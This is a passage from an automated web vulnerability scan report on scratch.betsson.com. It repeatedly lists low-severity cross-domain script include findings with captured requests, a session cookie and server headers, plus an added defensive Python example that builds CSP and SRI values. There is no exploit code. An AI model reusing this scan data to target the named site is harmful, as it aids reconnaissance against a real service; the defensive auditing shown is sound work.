19.81. https://scratch.betsson.com/en/Fantasy/Outer-Space

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/Outer-Space

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Fantasy/Outer-Space HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:14 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:14 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:14 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:14 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:52:14 GMT
Connection: close
Content-Length: 102711


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.82. https://scratch.betsson.com/en/Fantasy/Super-Chance

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/Super-Chance

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Fantasy/Super-Chance HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:36 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:36 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:36 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:36 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:51:36 GMT
Connection: close
Content-Length: 102711


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.83. https://scratch.betsson.com/en/Fantasy/The-Fairy-Tale

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/The-Fairy-Tale

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Fantasy/The-Fairy-Tale HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:06 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:06 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:06 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:06 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:52:06 GMT
Connection: close
Content-Length: 102711


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.84. https://scratch.betsson.com/en/Fantasy/The-Lost-Maya

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/The-Lost-Maya

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Fantasy/The-Lost-Maya HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:07 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:07 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:07 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:07 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:52:06 GMT
Connection: close
Content-Length: 102716


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.85. https://scratch.betsson.com/en/Fantasy/Treasure-Island

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/Treasure-Island

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Fantasy/Treasure-Island HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:32 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:32 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:32 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:32 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:51:32 GMT
Connection: close
Content-Length: 102701


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.86. https://scratch.betsson.com/en/Fantasy/Zodiac

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/Zodiac

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Fantasy/Zodiac HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:24 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:24 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:24 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:24 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:51:24 GMT
Connection: close
Content-Length: 102721


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...
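The following is an added example and is not part of the XSS.CX / Burp report: it reproduces the scanner's cross-domain script include check over a sample response body and derives the two standard mitigations, a Content-Security-Policy script-src allowlist and a Subresource Integrity hash. The sample HTML is constructed from the four script tags visible in the responses in this section plus one same-origin script for contrast; the script body hashed at the end is made up and the real CDN file would give a different hash. Note that the check, like Burp's, flags any host other than the page's own, so a sibling subdomain would be reported too and the reviewer has to judge whether it is under the same control.

```python
"""Cross-domain script include: detection plus the CSP and SRI mitigations.

Added example, not code from the XSS.CX / Burp report. SAMPLE_HTML is
constructed from the four <script src> tags visible in the report's
responses; the script body hashed for SRI is made up.
"""
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlsplit

PAGE_HOST = "scratch.betsson.com"

# Constructed sample response body (the real one is ~100 KB and snipped in
# the report); one relative, same-origin script is added for contrast.
SAMPLE_HTML = """<html><head id="head">
<script type="text/javascript" src="/scripts/local.js"></script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
</head><body></body></html>"""


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> start tag."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.sources.append(value.strip())


def cross_domain_scripts(html, page_host):
    """Return the script URLs whose host differs from page_host.

    Relative URLs have no host and are same-origin, so they are skipped.
    Any other host is reported, including sibling subdomains; whether such
    a host is really third party is a judgement left to the reviewer.
    """
    collector = ScriptSrcCollector()
    collector.feed(html)
    hits = []
    for src in collector.sources:
        host = urlsplit(src).hostname  # None for relative URLs
        if host is not None and host.lower() != page_host.lower():
            hits.append(src)
    return hits


def csp_script_src(cross_domain):
    """Build a script-src directive allowing the page's own origin plus only
    the third-party origins actually observed (a protocol-relative src is
    assumed to be https)."""
    origins = []
    for src in cross_domain:
        parts = urlsplit(src)
        origin = f"{parts.scheme or 'https'}://{parts.netloc}"
        if origin not in origins:
            origins.append(origin)
    return ("script-src 'self' " + " ".join(origins)).strip()


def sri_integrity(script_bytes, algo="sha384"):
    """Value for <script integrity="..."> so the browser refuses the file if
    the CDN ever serves anything other than the audited bytes."""
    digest = hashlib.new(algo, script_bytes).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


if __name__ == "__main__":
    found = cross_domain_scripts(SAMPLE_HTML, PAGE_HOST)
    for url in found:
        print("cross-domain script:", url)
    print("Content-Security-Policy:", csp_script_src(found))
    # Made-up script body standing in for the real CDN file.
    print("integrity:", sri_integrity(b"window.df = {};"))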

19.87. https://scratch.betsson.com/en/GameHistory

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/GameHistory

Issue detail

The response dynamically includes the following scripts from another domain, ble.hs.llnwd.net (a CDN host outside betsson.com; the four script tags are shown in the response body below):
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/GameHistory HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:56:12 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:56:12 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:56:12 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:56:12 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:56:11 GMT
Connection: close
Content-Length: 101271


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.88. https://scratch.betsson.com/en/Information

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Information

Issue detail

The response dynamically includes the following scripts from another domain, ble.hs.llnwd.net (a CDN host outside betsson.com; the four script tags are shown in the response body below):
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Information HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:51 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:51 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:51 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:51 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:51 GMT
Connection: close
Content-Length: 104385


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.89. https://scratch.betsson.com/en/News

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/News

Issue detail

The response dynamically includes the following scripts from another domain, ble.hs.llnwd.net (a CDN host outside betsson.com; the four script tags are shown in the response body below):
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/News HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:35 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:35 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:35 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:35 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:35 GMT
Connection: close
Content-Length: 130056


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.90. https://scratch.betsson.com/en/OurScratchcards

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/OurScratchcards

Issue detail

The response dynamically includes the following scripts from another domain, ble.hs.llnwd.net (a CDN host outside betsson.com; the four script tags are shown in the response body below):
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/OurScratchcards HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:38 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:38 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:38 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:38 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:39 GMT
Connection: close
Content-Length: 189403


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.91. https://scratch.betsson.com/en/Ourwinners

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Ourwinners

Issue detail

The response dynamically includes the following scripts from another domain, ble.hs.llnwd.net (a CDN host outside betsson.com; the four script tags are shown in the response body below):
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Ourwinners HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:49 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:49 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:49 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:49 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:49 GMT
Connection: close
Content-Length: 107524


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.92. https://scratch.betsson.com/en/Slots/5th-Avenue

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
